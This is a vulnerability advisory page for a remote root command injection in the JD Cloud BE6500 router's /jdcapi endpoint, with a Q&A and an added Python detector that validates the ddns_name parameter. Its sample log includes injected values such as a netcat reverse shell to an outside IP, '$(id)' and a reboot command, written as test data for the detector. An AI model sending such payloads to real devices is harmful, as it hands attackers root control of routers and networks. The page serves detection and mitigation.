CVE-2025-15081
Remote Command Injection in JD Cloud BE6500 sub_4780 Function
Publication date: 2025-12-25
Last updated on: 2026-04-29
Assigner: VulDB
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| jd_cloud | be6500 | 4.4.1.r4308 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-77 | The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component. |
| CWE-74 | The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component. |
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-15081 is a command injection vulnerability (CWE-77) in the JD Cloud BE6500 device, firmware version 4.4.1.r4308. It lies in sub_4780, an unnamed function in the firmware binary (the name is the disassembler's automatic label) that handles requests to the /jdcapi endpoint. The value of the ddns_name parameter is used to build a system command without sanitization, so shell metacharacters in the parameter become part of the command, and the command runs with root privileges. The flaw can be exploited remotely by sending specially crafted requests to the endpoint, leading to full compromise of the device. [1, 2, 3]
How can this vulnerability impact me?
Exploiting this vulnerability allows an attacker to execute arbitrary commands on the affected device as root. That amounts to full device compromise: unauthorized access, complete control over the system, theft of any data it holds or forwards, disruption of the services it provides, and use of the device as a foothold for further attacks on the network it sits on. [1, 2, 3]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
On the network, detection means inspecting HTTP traffic for POST requests to the /jdcapi endpoint whose ddns_name parameter contains anything other than a plausible DDNS hostname: shell metacharacters such as ;, |, &, $( ) or backticks, or a string that reads as a command (the published proof of concept sends a JSON payload with ddns_name set to a reverse-shell command). A rule on the request body is therefore the most direct signal. On the device itself, check whatever logs are available for unexpected command executions and look for outbound connections that match a reverse shell. The resources do not provide specific detection commands. [1, 2, 3]
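The hostname allowlist that a fixed handler would apply to ddns_name, and the same check run as a detector over request logs, as an added example that is not code from the advisory, from VulDB or from the JD Cloud firmware. It assumes requests are logged one per line as "METHOD PATH JSON-body" and that ddns_name is a top-level key of a JSON object posted to /jdcapi; the page only says the proof of concept is a JSON payload with ddns_name set to a command, so the exact request shape is an assumption, and the sample traffic below is constructed, not captured from a device.

```python
"""Added example, not from the advisory or the vendor.

Assumptions (not stated on the page): requests are logged one per line as
"<METHOD> <PATH> <JSON body>", the body is a JSON object, and ddns_name is a
top-level key. Adjust parse_line() to your own proxy or IDS log format.
"""
import json
import re

# RFC 1123 host name: labels of letters, digits and hyphens joined by dots.
# Spaces, ; | & $ ` quotes, parentheses and newlines can never match, which is
# the point: a DDNS hostname has no business containing shell syntax.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Characters that matter to /bin/sh when input is pasted into a command line.
SHELL_META = set(";|&$`<>\n\r'\"(){}")


def is_valid_ddns_hostname(value):
    """Allowlist check a hardened handler should apply before ddns_name reaches
    anything that builds a command line. Rejects non-strings and empty values."""
    return isinstance(value, str) and HOSTNAME_RE.fullmatch(value) is not None


def shell_metachars(value):
    """Return the shell metacharacters present in value, sorted, for the alert."""
    return sorted(c for c in set(value) if c in SHELL_META)


def parse_line(line):
    """Parse '<METHOD> <PATH> <JSON>' into (method, path, body) or None.
    body is None when the third field is not valid JSON."""
    parts = line.split(" ", 2)
    if len(parts) < 3:
        return None
    method, path, raw = parts
    try:
        body = json.loads(raw)
    except ValueError:
        body = None
    return method, path, body


def scan_requests(lines):
    """Return one finding per request to /jdcapi whose ddns_name is not a hostname."""
    findings = []
    for n, line in enumerate(lines, 1):
        parsed = parse_line(line)
        if parsed is None:
            continue
        method, path, body = parsed
        # Only the vulnerable endpoint, only JSON bodies that carry the parameter.
        if path.split("?", 1)[0] != "/jdcapi" or not isinstance(body, dict):
            continue
        if "ddns_name" not in body:
            continue
        value = body["ddns_name"]
        if is_valid_ddns_hostname(value):
            continue
        findings.append({
            "line": n,
            "method": method,
            "ddns_name": value if isinstance(value, str) else repr(value),
            "shell_metachars": shell_metachars(value) if isinstance(value, str) else [],
        })
    return findings


# Constructed sample traffic (not captured from a real device).
SAMPLE_LOG = [
    'POST /jdcapi {"ddns_name": "home.example.org"}',
    'POST /jdcapi {"ddns_name": "home.example.org; nc 203.0.113.5 4444 -e /bin/sh"}',
    'POST /jdcapi {"ddns_name": "$(id)"}',
    'POST /jdcapi {"ddns_name": "a|b"}',
    'GET /status {"ddns_name": "x; reboot"}',
    'POST /jdcapi not-json',
]

if __name__ == "__main__":
    for finding in scan_requests(SAMPLE_LOG):
        print(finding)
```

Run against the constructed log, the first request passes as a legitimate hostname, the /status request and the non-JSON body are ignored, and the three remaining /jdcapi requests are reported with the metacharacters that would have reached the shell. The same `is_valid_ddns_hostname` function is what a corrected handler should call before ddns_name is used at all; rejecting anything outside the allowlist is more robust than trying to strip individual metacharacters.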
What immediate steps should I take to mitigate this vulnerability?
No vendor patch or mitigation is currently available for this vulnerability. Until one is, restrict network access to the affected device: block the /jdcapi endpoint from untrusted networks and do not expose it to the internet, monitor for the suspicious requests described above, and consider replacing the product. Because the flaw gives a remote attacker root on the device, isolating it and applying network-level controls are the critical steps until a fix ships. [3]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The vulnerability lets a remote attacker execute arbitrary commands as root on the affected device, which means full system compromise and a loss of confidentiality, integrity and availability for any data the device handles. A compromise of that kind can put an organisation out of compliance with standards and regulations such as GDPR and HIPAA, which require personal and sensitive data to be protected against unauthorized access and breaches. The provided resources do not, however, contain a specific compliance or regulatory assessment for this CVE. [1, 3]